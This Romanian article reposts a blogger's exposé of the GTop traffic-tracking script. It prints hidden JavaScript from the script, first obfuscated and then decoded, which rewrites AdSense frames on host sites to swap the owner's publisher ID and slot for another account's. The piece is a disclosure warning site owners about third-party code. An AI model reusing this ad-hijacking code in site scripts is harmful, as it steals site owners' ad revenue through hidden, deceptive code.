Atenție la codurile pe care le puneți pe site. Iată ce s-a descoperit în codul de urmărire de la GTop

Pentru monitorizarea traficului unui site, statistici, analize și comparații este de-ajuns să adaugi pe site-ul propriu un cod de urmărire. Servicii de monitorizare sunt multe, oferite gratuit sau pe bază de abonament.

Dar te-ai gândit ce se poate ascunde într-un cod aparent inofensiv?

Iată cum un asemenea serviciu oferit gratuit de proiectul românesc de monitorizare trafic web GTop te poate afecta financiar, prin modificarea ID-urilor de publisher pentru reclamele AdSense de pe site-ul tău.

Citește articolul de mai jos, preluat de pe http://descoperiregtop.blogspot.ro/ cu acordul autorului randypfr:

„Nu știu dacă a avut cineva vreodată curiozitatea să vadă cum arată js-ul pe care gtop îl încarcă pe site-ul vostru pentru a monitoriza traficul.

Pentru cine vrea să-l vadă, fișierul este aici și, după cum puteți vedea, este comprimat însă poate fi decomprimat foarte ușor folosind acest site.

Curios fiind, l-am decomprimat sa văd și eu cum arată.Totul bine și frumos până am dat de aceste linii:

var _0x47ca = ["\x67\x6F\x6F\x67\x6C\x65\x5F\x61\x64\x73\x5F\x66\x72\x61\x6D\x65", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x73\x72\x63", "\x6D\x61\x74\x63\x68", "\x63\x61\x2D\x70\x75\x62\x2D\x32\x36\x31\x32\x39\x30\x30\x36\x37\x32\x39\x32\x31\x36\x38\x32", "\x72\x65\x70\x6C\x61\x63\x65", "\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D\x31\x39\x33\x34\x37\x33\x30\x38\x30\x33"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() {
  for (i = 1; i <= 4; i++) {
     if (document[_0xfcf0[1]](_0xfcf0[0] + i)) {
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) {
             var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
             var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
             document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3
         }
     }
  }
};
if (site_id != 41219 && site_id != 23216) sSt();

Cum nu prea îmi place să încarc javascript-uri codate pe site-urile mele fără să știu despre ce e vorba, mi-am bătut puţin capul și am decodat și partea asta de cod, rezultatul obținut fiind acesta:

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document[_0xfcf0[1]](_0xfcf0[0] + i)) 
      {            
         src = document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]];            
         if (src[_0xfcf0[3]](/w=468/) && src[_0xfcf0[3]](/h=60/)) 
         {                
            var _0x2266x3 = src[_0xfcf0[5]](/(ca-pub-[0-9]+)/ig, _0xfcf0[4]);
            var _0x2266x3 = _0x2266x3[_0xfcf0[5]](/(slotname=[0-9]+)/ig, _0xfcf0[6]);
            document[_0xfcf0[1]](_0xfcf0[0] + i)[_0xfcf0[2]] = _0x2266x3            
         }        
      }    
   }
};

Mi s-a părut puțin cam ciudat sa vad pe acolo cuvinte precum "google_ads", "ca-pub-2612900672921682", sau "replace" asa ca am făcut câteva replace-uri și am obținut asta:

var _0x47ca = ["google_ads_frame", "getElementById", "src", "match", "ca-pub-2612900672921682", "replace", "slotname=1934730803"];
var _0xfcf0 = [_0x47ca[0], _0x47ca[1], _0x47ca[2], _0x47ca[3], _0x47ca[4], _0x47ca[5], _0x47ca[6]];
function sSt() 
{    
   for (i = 1; i <= 4; i++) 
   {        
      if (document.getElementById("google_ads_frame" + i)) 
      {            
         src = document.getElementById("google_ads_frame" + i).src;            
         if (src.match(/w=468/) && src.match(/h=60/)) 
         {                
            var _0x2266x3 = src.replace(/(ca-pub-[0-9]+)/ig, "ca-pub-2612900672921682");
            var _0x2266x3 = _0x2266x3.replace(/(slotname=[0-9]+)/ig, "slotname=1934730803");
            document.getElementById("google_ads_frame" + i).src = _0x2266x3            
         }        
      }    
   }
};

Știți  ce face codul asta (ce făcea de fapt)? Înlocuiește id-urile voastre de la reclamele 468x60 de la Google AdSense cu id-urile celor de la gtop. Cu alte cuvinte înlocuiește RECLAMELE VOASTRE cu RECLAMELE LOR chiar pe SITE-URILE VOASTRE!!!

Am spus "făcea" pentru ca acum AdSense și-a schimbat codurile și micuțul lor script de mai sus nu mai funcționează (cel puțin în testele mele nu a funcționat).

După cum puteți observa, în cod este următorul if : "if (site_id != 41219 && site_id != 23216) sSt();". Ce face acest if ? Ei bine, verifică dacă nu cumva codul este plasat pe unul din site-urile cu id-ul 41219 sau 23216 (id-uri care nu mai sunt active în acest moment), id-uri care presupun ca aparțineau site-urilor unor admini. În cazul în care codul este plasat pe un site cu un alt id fata de cele doua de mai sus, se executa function sSt() care face treaba cu codurile de la AdSense.”

Iată deci, de ce e este recomandat să te informezi temeinic despre schimbările pe care urează să le faci sau să ceri o părere avizată în domeniu înainte a pune orie fel de cod pe site-ul propriu.